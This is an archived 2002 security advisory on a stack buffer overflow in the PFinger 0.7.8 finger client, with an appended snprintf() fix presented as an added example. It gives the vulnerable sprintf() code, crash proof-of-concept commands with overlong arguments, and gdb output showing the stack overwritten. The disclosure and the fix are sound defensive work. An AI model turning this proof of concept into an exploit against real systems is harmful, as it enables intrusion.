PFinger Buffer Overflow Vulnerability.

* Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)

* Overview:

The PFinger program has an array bounds overflow bug. This one was found in the client; I did not confirm whether the server side is also affected. Various similar bugs may exist anyway. :-(

* Description:

The overflow happens in the array "query" (size 100). Using the -l, -d or -t options makes no difference; the result is the same. The cause is the incorrect use of sprintf() at line 144: argv[optind] is copied into query without any length check.

=== pfinger-0.7.8/src/finger.c =================================
    :
    :
int main( int argc, char *argv[] )
{
    int flag;
    char *progname;
    int info = 0;
    char *hostname;
    char query[100];
    :
    :
        /* argv[optind] is written into the 100-byte query with no length check */
        sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
                                                         ~~~~~~~~~~~~
        DoFinger1(hostname, query);
        optind++;
    }
    :
    :
================================================================

The buffer then sits on the stack laid out as follows:

    query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];

* Proof of concept:

[x82@xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82@xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82@xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82@xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82@xpl017elz src]$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
[x82@xpl017elz src]$

- Debugging -

[x82@xpl017elz src]$ gdb -q ./finger
(gdb) r -l `perl -e 'print "x"x100'`
Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "x"x100'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.

Program received signal SIGSEGV, Segmentation fault.
0x4005000a in _ufc_foobar () from /lib/libc.so.6
(gdb) r -l `perl -e 'print "x"x101'`

Program received signal SIGSEGV, Segmentation fault.
0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
(gdb) r -l `perl -e 'print "x"x102'`

Program received signal SIGSEGV, Segmentation fault.
0xa0d78 in ?? ()
(gdb)
(gdb) r -l `perl -e 'print "x"x105'`
Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "x"x105'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.

Program received signal SIGSEGV, Segmentation fault.
0x400a4b53 in strrchr () from /lib/libc.so.6
(gdb) where
#0  0x400a4b53 in strrchr () from /lib/libc.so.6
#1  0xbffff564 in ?? ()
#2  0x78787878 in ?? ()
Cannot access memory at address 0x78787878.
(gdb)

P.S: Sorry, my poor English.

__
By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
E-mail: szoahcat_private
Home: http://x82.i21c.net
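The fix a maintainer would want for the sprintf() call described above, as an added example that is not code from the advisory or from the PFinger project: the query is built with snprintf() and its return value is checked, so an over-long user name is rejected instead of overrunning the 100-byte stack buffer. The function names, the return convention and the "alice" default are my own assumptions.

```c
/* Added example (not from the advisory or PFinger): the query-building
 * step of finger.c rewritten with a bounds check. Names are assumptions. */
#include <stdio.h>
#include <string.h>

#define QUERY_SIZE 100            /* matches char query[100] in finger.c */

/* Bytes the original sprintf() would write, including the terminating NUL.
 * Anything above QUERY_SIZE overruns the stack buffer. */
size_t query_bytes_needed(int info, const char *user)
{
    return (info ? strlen("/W_") : 0) + strlen(user) + strlen("\r\n") + 1;
}

/* Hardened replacement for
 *   sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
 * Returns 0 and fills dst on success, -1 if the result would not fit.
 * snprintf() never writes past dstlen, and its return value (the length
 * the complete string would have had) tells us whether it was truncated. */
int build_query(char *dst, size_t dstlen, int info, const char *user)
{
    int n = snprintf(dst, dstlen, "%s%s\r\n", info ? "/W_" : "", user);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';            /* never send a truncated query */
        return -1;
    }
    return 0;
}

int main(int argc, char *argv[])
{
    char query[QUERY_SIZE];
    const char *user = argc > 1 ? argv[1] : "alice";  /* constructed default */
    int info = 0;                                     /* 1 when -l/-d/-t given */

    if (build_query(query, sizeof query, info, user) != 0) {
        fprintf(stderr, "finger: user name too long (%zu bytes needed, %d available)\n",
                query_bytes_needed(info, user), QUERY_SIZE);
        return 1;
    }
    printf("query: %s", query);
    return 0;
}
```

Run with the advisory's 130-byte argument (perl -e 'print "x"x0x82') and the program now exits with an error instead of a segmentation fault.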
This archive was generated by hypermail 2b30 : Tue Jun 04 2002 - 10:24:33 PDT